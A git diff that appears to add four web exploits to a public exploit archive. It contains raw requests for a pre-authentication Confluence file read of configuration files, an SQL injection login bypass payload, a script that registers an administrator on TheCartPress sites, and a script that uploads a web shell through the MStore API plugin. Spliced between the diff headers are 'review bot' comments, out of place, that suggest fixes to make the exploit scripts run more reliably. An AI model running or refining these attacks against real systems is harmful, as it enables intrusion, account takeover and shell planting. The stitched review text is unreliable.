diff --git a/exploits/java/webapps/50377.txt b/exploits/java/webapps/50377.txt
new file mode 100644
index 000000000..fe0432d29
--- /dev/null
+++ b/exploits/java/webapps/50377.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
+# Date: 2021-10-05
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
+# Tested on: Kali Linux & Windows 10
+# CVE : CVE-2021-26085
+
+POC #1 - web.xml
+
+GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC #2 - seraph-config.xml
+
+GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC #3 - pom.properties
+
+GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC #4 - pom.xml
+
+GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/50376.txt b/exploits/php/webapps/50376.txt
new file mode 100644
index 000000000..5c1b9ccb3
--- /dev/null
+++ b/exploits/php/webapps/50376.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
+# Date: 04.10.2021
+# Exploit Author: Blackhan
+# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/grading_system/login.php
+2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /grading_system/Actions.php?a=login HTTP/1.1
+Host: localhost
+Content-Length: 45
+sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/grading_system/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j
+Connection: close
+
+username=bypass'+or+1%3D1--+-&password=bypass
\ No newline at end of file
diff --git a/exploits/php/webapps/50378.py b/exploits/php/webapps/50378.py
new file mode 100755
index 000000000..ebbf10783
--- /dev/null
+++ b/exploits/php/webapps/50378.py
@@ -0,0 +1,65 @@
+# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
+# Google Dork: inurl:/wp-content/plugins/thecartpress/
+# Date: 04/10/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugin/thecartpress
+# Version: <= 1.5.3.6
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+ print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
+ print("Author -> space_hen (www.github.com/spacehen)")
+
+def print_usage():
+ print("Usage: python3 exploit.py [target url]")
+ print("Ex: python3 exploit.py https://example.com")
+
+def vuln_check(uri):
+ response = requests.get(uri)
+ raw = response.text
+ if ("User name is required" in raw):
+ return True;
+ else:
+ return False;
+
+def main():
+
+ print_banner()
+ if(len(sys.argv) != 2):
+ print_usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+
+ ajax_action = 'tcp_register_and_login_ajax'
+ admin = '/wp-admin/admin-ajax.php';
+
+ uri = base + admin + '?action=' + ajax_action ;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ data = {
+ "tcp_new_user_name" : "admin_02",
+ "tcp_new_user_pass" : "admin1234",
+ "tcp_repeat_user_pass" : "admin1234",
+ "tcp_new_user_email" : "test@test.com",
+ "tcp_role" : "administrator"
+ }
+ print("Inserting admin...");
+ response = requests.post(uri, data=data )
+ if (response.text == "\"\""):
+ print("Success!")
+ print("Now login at /wp-admin/")
+ else:
+ print(response.text)
+
+main();
\ No newline at end of file
diff --git a/exploits/php/webapps/50379.py b/exploits/php/webapps/50379.py
new file mode 100755
index 000000000..a9d62024f
--- /dev/null
+++ b/exploits/php/webapps/50379.py
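Review bot: Neither `requests.get(uri)` in `vuln_check` nor `requests.post(uri, data=data )` in `main` passes a `timeout=`, so a host that accepts the connection but never answers blocks the script indefinitely; `response = requests.get(uri, timeout=30)` and `response = requests.post(uri, data=data, timeout=30)` bound the wait. `main();` is also executed at import time rather than under `if __name__ == "__main__":`, which makes the module unusable from any test or wrapper. `vuln_check` can return the membership test directly, `return "User name is required" in raw`, instead of the `if`/`else` returning literal booleans, and `if(check == False):` reads better as `if not check:`. The `os.path`, `path` and `json` imports are unused in this file; indentation in this hunk appears to have been flattened by the rendering, so the nesting is inferred.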
@@ -0,0 +1,62 @@
+# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
+# Google Dork: inurl:/wp-content/plugins/mstore-api/
+# Date: 22/09/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
+# Version: 2.0.6, possibly higher
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+ print("MStore API < 2.0.6 - Arbitrary File Upload")
+ print("Author -> space_hen (www.github.com/spacehen)")
+
+def print_usage():
+ print("Usage: python3 exploit.py [target url] [shell path]")
+ print("Ex: python3 exploit.py https://example.com ./shell.php")
+
+def vuln_check(uri):
+ response = requests.post(uri)
+ raw = response.text
+
+ if ("Key must be" in raw):
+ return True;
+ else:
+ return False;
+
+def main():
+
+ print_banner()
+ if(len(sys.argv) != 3):
+ print_usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+ file_path = sys.argv[2]
+
+ rest_url = '/wp-json/api/flutter_woo/config_file'
+
+ uri = base + rest_url;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ if( path.isfile(file_path) == False):
+ print("(*) Invalid file!")
+ sys.exit(1)
+
+ files = {'file' : ( "config.json.php", open(file_path), "application/json" )}
+
+ print("Uploading shell...");
+ response = requests.post(uri, files=files )
+ # response should be location of file
+ print(response.text)
+
+main();
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 78209f7af..52036d535 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
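Review bot: `open(file_path)` in the `files` dict of `main` opens the file in text mode and never closes it: the handle is leaked, and text mode decodes the bytes with the locale encoding and translates newlines, so any non-text or non-UTF-8 input is either altered in transit or raises `UnicodeDecodeError` before the request is sent. Open it in binary mode inside a context manager and issue the request while it is open: `with open(file_path, "rb") as fh:` / `files = {'file': ("config.json.php", fh, "application/json")}` / `response = requests.post(uri, files=files, timeout=30)`. The same missing `timeout=` applies to `requests.post(uri)` in `vuln_check`, and `if( path.isfile(file_path) == False):` and `if(check == False):` read better as `if not path.isfile(file_path):` and `if not check:`. `main();` runs at import time and belongs under `if __name__ == "__main__":`; the `os.path` and `json` imports are unused, and the hunk's indentation appears flattened by the rendering, so nesting is inferred.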
@@ -44488,3 +44488,7 @@ id,file,description,date,author,type,platform,port
 50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
 50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,
+50376,exploits/php/webapps/50376.txt,"Student Quarterly Grading System 1.0 - SQLi Authentication Bypass",1970-01-01,Blackhan,webapps,php,
+50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
+50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
+50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,